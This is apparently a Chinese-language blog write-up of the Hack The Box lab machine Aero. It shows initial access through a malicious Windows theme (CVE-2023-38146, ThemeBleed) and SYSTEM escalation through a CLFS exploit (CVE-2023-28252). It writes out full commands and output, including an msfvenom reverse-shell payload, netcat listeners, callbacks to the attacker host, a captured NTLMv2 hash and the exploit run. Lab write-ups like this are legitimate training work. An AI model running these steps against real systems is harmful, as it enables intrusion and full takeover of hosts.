Aero-htb-writeup

0x00 靶场技能介绍

章节技能:WEB审查元素修改、CVE-2023-38146、敏感信息枚举、CVE—2023—28252

参考链接:无

0x01 用户权限获取

1、获取下靶机IP地址:10.10.11.237

2、获取下靶机的开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.11.237   
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 18:53 CST
Nmap scan report for 10.10.11.237
Host is up (0.47s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 --min-rate=10000  10.10.11.237 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 18:54 CST
Nmap scan report for 10.10.11.237
Host is up (0.32s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.04 seconds
                                                  
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.237 -sU 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 19:01 CST
Nmap scan report for 10.10.11.237
Host is up (0.31s latency).
All 65535 scanned ports on 10.10.11.237 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds

3、看来真的只开放了这一个端口,是场硬战啊,还是2023年的机器也比较新,瞅下80端口

http://10.10.11.237/

4、网页上面有个域名地址,先本地绑定下吧

support@aerohub.htb

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.237 aerohub.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.237 aerohub.htb

5、经过分析,发现网站源码上有一行隐藏的注释

6、把该注释取消掉,网站上面多出来一个功能按钮

7、经过分析,发现确实这个网站是让上传Windows主题的文件才行,在这里上传您的自定义主题!

https://learn.microsoft.com/zh-cn/windows/win32/controls/themesfileformat-overview

8、按照打新靶机的套路,直接搜相关的漏洞

https://www.bleepingcomputer.com/news/security/windows-11-themebleed-rce-bug-gets-proof-of-concept-exploit/

https://www.threatdown.com/blog/themebleed-exploit-is-another-reason-to-patch-windows-quickly/

https://github.com/exploits-forsale/themebleed

https://github.com/Jnnshschl/CVE-2023-38146

https://jnns.de/posts/cve-2023-38146-poc/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Kirkpatrick 在查看“奇怪的 Windows 文件格式”时发现了该漏洞,其中之一是用于自定义操作系统外观的文件的 .THEME。

这些文件包含对“.msstyles”文件的引用,这些文件不应包含任何代码,只包含调用它们的主题文件打开时加载的图形资源。

研究人员注意到,当使用版本号“999”时,处理 .MSSTYLES 文件的例程在验证 DLL(“_vrf.dll”)签名的时间和库加载的时间之间存在很大差异,从而产生了竞争条件。

使用特制的 .MSSTYLES,攻击者可以利用竞争窗口将经过验证的 DLL 替换为恶意 DLL,从而允许他们在目标计算机上运行任意代码。

柯克帕特里克创建了一个 PoC 漏洞,当用户启动主题文件时会打开 Windows 计算器。

研究人员还指出,从网上下载主题文件会触发“网络标记”警告,这可能会提醒用户存在威胁。但是,如果攻击者将主题包装到 .THEMEPACK 文件(CAB 存档)中,则可以绕过此警告。

启动 CAB 文件时,包含的主题会自动打开,而不会显示网络标记警告。

微软通过彻底删除“999 版”功能解决了这个问题。然而,Kirkpatrick 表示,潜在的竞争条件仍然存在。此外,微软没有解决主题包文件缺少网络标记警告的问题。

建议 Windows 用户尽快应用微软 20239 月的安全更新包,因为它修复了两个正在被积极利用的零日漏洞,以及各种应用程序和系统组件中的另外 57 个安全问题。

9、在上面的搜集过程中,还是发现了一个现成的利用工具,直接开始利用吧

https://github.com/Jnnshschl/CVE-2023-38146

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿offsec)-[~/Desktop/CVE-2023-38146]
└─$ python3 themebleed.py -r 10.10.14.45 -p 443
2024-05-23 20:00:59,116 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2024-05-23 20:00:59,116 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2024-05-23 20:00:59,582 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2024-05-23 20:00:59,582 INFO> Theme generated: "evil_theme.theme"
2024-05-23 20:00:59,582 INFO> Themepack generated: "evil_theme.themepack"

2024-05-23 20:00:59,582 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 443
2024-05-23 20:00:59,582 INFO> Starting SMB server: 10.10.14.45:445

2024-05-23 20:00:59,583 INFO> Config file parsed
2024-05-23 20:00:59,583 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2024-05-23 20:00:59,583 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2024-05-23 20:00:59,583 INFO> Config file parsed
2024-05-23 20:00:59,583 INFO> Config file parsed
2024-05-23 20:03:26,975 INFO> Incoming connection (10.10.11.237,57488)
2024-05-23 20:03:29,285 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2024-05-23 20:03:29,285 INFO> User AERO\sam.emerson authenticated successfully
2024-05-23 20:03:29,285 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:a59c0827f51cb03abfc707485f9a7e6a:01010000000000000028cb3809adda01c1333edd746bab5600000000010010004e0044006f0079005300490065005300030010004e0044006f0079005300490065005300020010004d00470041004400450078004d006100040010004d00470041004400450078004d006100070008000028cb3809adda0106000400020000000800300030000000000000000000000000200000a1c60778e59e0ea7e694b7d64db502ceb8abf35fcd0e77d8a8f2e56c4922410a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000
2024-05-23 20:03:29,563 INFO> Connecting Share(1:IPC$)
2024-05-23 20:03:30,211 INFO> Connecting Share(2:tb)
2024-05-23 20:03:31,061 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-05-23 20:03:34,386 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-05-23 20:03:41,389 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2024-05-23 20:03:42,247 INFO> Disconnecting Share(1:IPC$)
2024-05-23 20:03:44,618 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2024-05-23 20:03:55,400 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-05-23 20:03:57,513 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2024-05-23 20:04:40,562 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-05-23 20:04:46,921 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.237] 57489
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
aero\sam.emerson
PS C:\Windows\system32>

10、这里就获取到初始的shell了,我们直接查看第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\Windows\system32> cd C:/Users/sam.emerson/Desktop
cd C:/Users/sam.emerson/Desktop
PS C:\Users\sam.emerson\Desktop> dir
dir


    Directory: C:\Users\sam.emerson\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---         5/22/2024   7:45 PM             34 user.txt                                                             


PS C:\Users\sam.emerson\Desktop> cat user.txt
cat user.txt
bbba5b00a1cf7964dab9fe678f6526c9
PS C:\Users\sam.emerson\Desktop>

0x02 系统权限获取

11、经过各种手工枚举,发现在当前用户下有一个PDF文件和一个脚本文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PS C:\Users\sam.emerson> tree /F /A
tree /F /A
Folder PATH listing
Volume serial number is C009-0DB2
C:.
+---Contacts
+---Desktop
|       user.txt
|       
+---Documents
|       CVE-2023-28252_Summary.pdf
|       watchdog.ps1
|       
+---Downloads
+---Favorites
|   |   Bing.url
|   |   
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|       
+---Music
+---OneDrive
+---Pictures
|   +---Camera Roll
|   \---Saved Pictures
+---Saved Games
+---Searches
|       winrt--{S-1-5-21-3555993375-1320373569-1431083245-1001}-.searchconnector-ms
|       
\---Videos
PS C:\Users\sam.emerson>

12、这里我直接使用上面呢个漏洞搭建的SMB服务,我把文件拷贝下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\Users\sam.emerson> cd Documents
cd Documents
PS C:\Users\sam.emerson\Documents> dir
dir


    Directory: C:\Users\sam.emerson\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf                                           
-a----         9/26/2023   1:06 PM           1113 watchdog.ps1                                                         


PS C:\Users\sam.emerson\Documents> copy ./CVE-2023-28252_Summary.pdf \\10.10.14.45\tb\CVE-2023-28252_Summary.pdf
copy ./CVE-2023-28252_Summary.pdf \\10.10.14.45\tb\CVE-2023-28252_Summary.pdf
PS C:\Users\sam.emerson\Documents> copy ./watchdog.ps1 \\10.10.14.45\tb\watchdog.ps1
copy ./watchdog.ps1 \\10.10.14.45\tb\watchdog.ps1
PS C:\Users\sam.emerson\Documents>

13、经过分析发现,这是一个漏洞预警的文件,让进行打补丁的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
CVE—202328252摘要:漏洞类型:恶意升级目标组件:通用日志文件系统(CLFS)风险级别:严重利用日期:20222月起Microsoft发布的修补程序:20234


背景:Nokoyawa勒索软件集团自20222月以来一直活跃,直到20234月,微软才发布了解决此问题的补丁。此漏洞已被攻击者用作未经授权访问Windows系统的手段,因此我们必须应用必要的补丁程序来保护我们的基础设施。根据卡巴斯基的分析,自20226月以来,Nokoyawa勒索软件集团已经使用了针对CLFS驱动程序的其他漏洞,这些漏洞具有相似但不同的特征,所有这些都与单个漏洞开发者有关。


所需措施:立即修补:我们强烈建议尽快应用Microsoft针对CVE—202328252发布的安全修补程序,以缓解与此漏洞相关的风险。如果不这样做,我们的服务器可能会受到潜在的攻击。

审查和监测:除了打补丁,我们还应该对我们的服务器日志进行彻底审查,以检查任何可疑活动或未经授权访问的迹象。持续监控我们的服务器环境对于确保我们系统的安全至关重要。

安全意识:提醒所有团队成员保持良好的网络安全卫生的重要性至关重要。鼓励在适用的情况下使用强大、唯一的密码和双因素身份验证。


事件响应计划:确保我们的事件响应计划是最新的,并准备在发生任何安全事件时立即启动。及时检测和响应对于减轻潜在攻击的影响至关重要。

14、同时发现了自动查看的脚本文件。。。。

15、根据上面的那个PDF,可以确认应该是当前机器还没有打这个补丁,我这里开始进行漏洞提权攻击

https://github.com/duck-sec/CVE-2023-28252-Compiled-exe

16、下载木马

https://github.com/duck-sec/CVE-2023-28252-Compiled-exe/blob/master/exploit.exe

17、生成反弹shell的EXE文件

1
2
3
4
5
6
7
┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.45 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes

18、开始上传到当前文件内,结合上面我们使用的SMB服务进行上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
PS C:\Users\sam.emerson\Documents> cd ../Desktop
cd ../Desktop
PS C:\Users\sam.emerson\Desktop> copy \\10.10.14.45\tb\exploit.exe .
copy \\10.10.14.45\tb\exploit.exe .
PS C:\Users\sam.emerson\Desktop> dir
dir


    Directory: C:\Users\sam.emerson\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         5/22/2024  11:40 PM         367104 exploit.exe                                                          
-ar---         5/22/2024   7:45 PM             34 user.txt                                                             


PS C:\Users\sam.emerson\Desktop> copy \\10.10.14.45\tb\shell.exe .
copy \\10.10.14.45\tb\shell.exe .
PS C:\Users\sam.emerson\Desktop> dir
dir


    Directory: C:\Users\sam.emerson\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         5/22/2024  11:40 PM         367104 exploit.exe                                                          
-a----         5/23/2024   5:43 AM           7168 shell.exe                                                            
-ar---         5/22/2024   7:45 PM             34 user.txt                                                             


PS C:\Users\sam.emerson\Desktop>

19、开始执行利用提权:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
PS C:\Users\sam.emerson\Desktop> ./exploit.exe 1208 1 "C:\Users\sam.emerson\Desktop\shell.exe"
./exploit.exe 1208 1 "C:\Users\sam.emerson\Desktop\shell.exe"
Executing command: C:\Users\sam.emerson\Desktop\shell.exe


ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1


VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FF920244240
[+] pool NpAt VirtualAddress -->FFFFA685482FE000
[+] MY EPROCESSS FFFF800EDAFD4140
[+] SYSTEM EPROCESSS FFFF800ED26FC040
[+] _ETHREAD ADDRESS FFFF800ED8114080
[+] PREVIOUS MODE ADDRESS FFFF800ED81142B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80251613220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8025162BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF8024CF43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF8024D5C87B0

[+] Kernel PoFxProcessorNotification --------------------------> FFFFF8024CFDBD00


PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\25
[+] Base file path = C:\Users\Public\25.blf
[+] Container file name path = C:\Users\Public\.p_25
Last kernel CLFS address = FFFFA6853F00F000
numero de tags CLFS founded 9

Last kernel CLFS address = FFFFA68541ED9000
numero de tags CLFS founded 1

[+] Log file handle: 000000000000011C
[+] Pool CLFS kernel address: FFFFA68541ED9000

number of pipes created =5000

number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFA6853AC41594
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM

20、成功获取到高权限的shell

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.237] 57493
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Users\sam.emerson\Desktop>whoami
whoami
nt authority\system

C:\Users\sam.emerson\Desktop>

21、查看flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\Users\sam.emerson\Desktop>cd C:/Users/administrator/Desktop
cd C:/Users/administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C009-0DB2

 Directory of C:\Users\Administrator\Desktop

09/27/2023  04:21 AM    <DIR>          .
09/20/2023  05:15 AM    <DIR>          ..
05/22/2024  07:45 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,721,974,272 bytes free

C:\Users\Administrator\Desktop>cat root.txt
cat root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
419361783f936ba7ec3ca72cd73bde9e

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/571

打靶记
#shooting-range
Aero-htb-writeup
https://sh1yan.top/2024/05/24/Aero-htb-writeup/
作者
shiyan
发布于
2024年5月24日
许可协议